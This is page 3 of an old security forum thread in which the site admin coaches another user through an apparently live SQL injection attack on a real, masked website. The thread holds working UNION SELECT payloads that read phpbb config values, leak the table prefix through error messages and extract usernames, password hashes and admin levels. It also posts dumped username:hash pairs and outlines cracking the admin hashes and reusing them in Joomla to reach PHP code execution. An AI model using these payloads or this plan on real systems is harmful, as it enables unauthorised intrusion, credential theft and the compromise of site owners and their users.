 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Sun Nov 09, 2008 2:55 am |
 |
|
| skmpz |
| Advanced user |
 |
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
 |
|
 |
|
btw the some of the results are..
| Code: | chahrazad:9fd8301ac24fb88e65d9d7cd1dd1b1ec
missquemado:30f4e146c8759e8c570971e28bbf42c7
Shebekia:256e0e775a10c23fb187d4482dfb8641
aardbei:e631763418d12235f45feae6e3394bb0
Chadiaatje:88a6a0262491103f0755d4d3f5abdb53
knaakbert:f31227b74bac22d2c79b8cc8da7d82a7
Noredine:ba6cf8ef30cd268ba20ed90032072134 |
are these the real usernames ? :S
i dont think those usernames exist :S :S |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:04 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Id2 admin is default admin, created by installer. There can be more admins and have seen foums, where actually id2 user is deleted. But it's easy to "filter out" users with admin rights, because such info is located in same users table ... |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:10 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
sorry man but.. ive checked those usernames on forum and they do NOT exist..
wtf? |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:13 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| There can be more than one forum installed on same database (with different table prefix) or in different database. If you can find, where is located this specific forum and if you can crack admin's hash, then it may be the way to the php code execution level in target server ... |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:26 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
ok . now i'm starting to feel a little confused  ..
this might be the passwords to some other forum ? |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:39 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Try this in order to reveal forum relative path:
| Code: |
http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,config_value,3,4,5,6,7,8,9,10+FROM+phpbb_config+WHERE+config_name=0x7363726970745f70617468
|
... and server name:
| Code: |
http://www.xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,config_value,3,4,5,6,7,8,9,10+FROM+phpbb_config+WHERE+config_name=0x7365727665725f6e616d65
|
|
|
Last edited by waraxe on Sun Nov 09, 2008 3:55 am; edited 1 time in total |
|
|
|
| Posted: Sun Nov 09, 2008 3:43 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE config_name=0x7363726970745f70617468' at line 1
:S |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:55 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
with
| Code: | | /index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,config_name,config_value),3,4,5,6,7,8,9,10+FROM+phpbb_config |
config_id:1
maybe this might be useful ? |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:57 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
I fixed those queries, try them now. Anyway, i'm offline now, it's 5:56 AM here where i live  |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:58 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
same time here
gnite |
|
|
|
|
| Posted: Sun Nov 09, 2008 2:49 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
soooooo........
i found
| Code: | www.****.nl
/forum/ |
but when i try
there is no forum installed there
well thats weird
[[ edited by waraxe - no sensitive info posting!! ]] |
|
|
|
|
|
 |
|
 |
| Posted: Sun Nov 09, 2008 3:10 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
It means, that specific forum tables are leftover from phpbb installation, that is no longer in use. If you look at that website's index page, then you can find, that it's based now on Joomla CMS.
So, what you can do right now:
1. fetch phpbb admin hash(es), try to reveal plaintext password and there is a chance, that it's reused in Joomla.
2. try to read Joomla database - default users table is "jos_users". Obtain some admin hashes and try to crack them. Idea is to get Joomla's admin access level, which can finally lead to arbitrary php code execution level.
3. you can try this against target's phpbb installation:
| Code: |
http://localhost/phpbb.2.0.20/memberlist.php?start=-1
|
If you are lucky, then error message shows up:
| Code: |
Could not query users
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50
Line : 151
File : memberlist.php
|
... revealing phpbb table prefix |
|
|
|
|
|
|
|
|
| Posted: Sun Nov 09, 2008 3:33 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
and hell yeah im lucky
ok now.. its apol_forum_users
so..
| Code: | | http://xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,username,user_password,user_level),3,4,5,6,7,8,9,10+FROM+apol_forum_users+ORDER+BY+id+ASC+LIMIT+1,1 |
i used user_level (admin is 1) ..
but i tried the 1st 5-6 usernames but none of them has user level 1 :S |
|
|
|
|
| Posted: Sun Nov 09, 2008 3:39 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Code: |
http://xxxxxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,CONCAT_WS(0x3a,username,user_password,user_level),3,4,5,6,7,8,9,10+FROM+apol_forum_users+WHERE+user_level=1+ORDER+BY+id+ASC+LIMIT+0,1
|
|
|
|
|
|
| Posted: Sun Nov 09, 2008 3:45 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
oh cool..
thx a million waraxe |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 3 of 4
Goto page Previous1, 2, 3, 4Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 65
Members: 0
Total: 65
